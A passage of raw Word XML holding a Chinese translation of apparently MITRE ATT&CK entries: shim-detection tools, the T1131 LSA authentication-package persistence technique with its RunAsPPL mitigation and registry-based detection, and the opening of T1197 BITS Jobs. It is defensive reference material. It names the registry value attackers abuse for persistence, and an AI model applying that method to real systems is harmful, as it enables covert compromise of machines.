        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4269FAF5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以下公共工具可用来检测当前可用的垫片：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CD6949" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00771025" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="00771025">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Shim-Process-Scanner  - </w:t>
      </w:r>
      <w:r w:rsidRPr="00771025">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检查每个运行中进程的内存是否有任何</w:t>
      </w:r>
      <w:r w:rsidRPr="00771025">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Shim</w:t>
      </w:r>
      <w:r w:rsidRPr="00771025">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>标志</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414CFF05" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00771025" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="00771025">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Shim-Detector-Lite  - </w:t>
      </w:r>
      <w:r w:rsidRPr="00771025">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检测自定义</w:t>
      </w:r>
      <w:r w:rsidRPr="00771025">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shim</w:t>
      </w:r>
      <w:r w:rsidRPr="00771025">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库的安装</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E03311" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00771025" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="00771025">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Shim-Guard  - </w:t>
      </w:r>
      <w:r w:rsidRPr="00771025">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控注册表来</w:t>
      </w:r>
      <w:r w:rsidRPr="00771025">
        <w:t>查看垫片安装</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5113DB42" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00771025" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="00771025">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ShimScanner  - </w:t>
      </w:r>
      <w:r w:rsidRPr="00771025">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>取证工具，用于在内存中查找活动的垫片</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CF42C8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00771025" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="00771025">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ShimCacheMem  - Volatility</w:t>
      </w:r>
      <w:r w:rsidRPr="00771025">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>插件，</w:t>
      </w:r>
      <w:r w:rsidRPr="00771025">
        <w:t>用于</w:t>
      </w:r>
      <w:r w:rsidRPr="00771025">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从内存中提取垫片缓存（注意：只在重启后缓存垫片）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074190EE" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sdbinst.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进程</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和命令行参数来查看</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>是否有</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用垫片滥用的情况。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7961BC9F" w14:textId="72545742" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="005D2A5D" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>身份</w:t>
      </w:r>
      <w:r w:rsidR="000F2665" w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>认证包</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="6B60A83C" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="358E1F82" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>T1131</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="285B7D3E" w14:textId="6F25599A" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidR="00680B04">
              <w:t>持久化</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58E08425" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="383A6A5D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>所需权限：管理员</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="340F5358" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>动态</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>链接库监控，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>indows</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>注册表，已加载动态链接库</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4AFD1D7A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7622FA9B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36F51368" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>身份认证包动态链接库在系统启动时由</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LSA</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（本地安全机构）进程加载。它们为操作系统的多个登录过程和多个安全协议提供支持。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F64370" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能会使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LSA</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>身份认证包提供的自动启动机制来实现持久性，方法是在</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注册表位置</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>放置二进制文件的引用，其键值为</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>"Authentication Packages"=</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后，在加载身份认证包时，系统将执行二进制文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C86048A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2405"/>
        <w:gridCol w:w="7331"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00771025" w14:paraId="5F6354C5" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="6C690EDA" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00771025" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00771025">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7331" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="156BB09E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00771025" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00771025">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="1E6D1A86" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00B7EC53" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>特权进程</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>完整性</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7331" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2AF1EF11" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="39434C"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>在</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>Windows 8.1</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>Windows Server 2012 R2</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>和更高版本中</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>可以通过设置注册表项</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
              </w:rPr>
              <w:t>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>使</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>LSA</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>作为</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>PPL</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>（受保护进程指示灯）运行。前提是</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>LSA</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>加载</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>的所有动态链接库都是</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>由</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>微软</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>签名的</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5A9F4043" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A7127AA" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520B7455" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控注册表来查看</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>是否有</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LSA</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注册表项的相关更改。监控</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>LSA</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进程来查看</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>是否有动态链接库加载行为。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows 8.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows Server 2012 R2</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能会在未签名的动态链接库尝试通过在注册表项</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LSASS.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中设置</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>auditlevel=8</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>加载到</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LSA</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时生成事件。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7AB6F9" w14:textId="1869409F" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="00A476EA" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>BITS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>作业</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="7BE2D0BF" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2ACA3CFC" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>T1197</w:t>
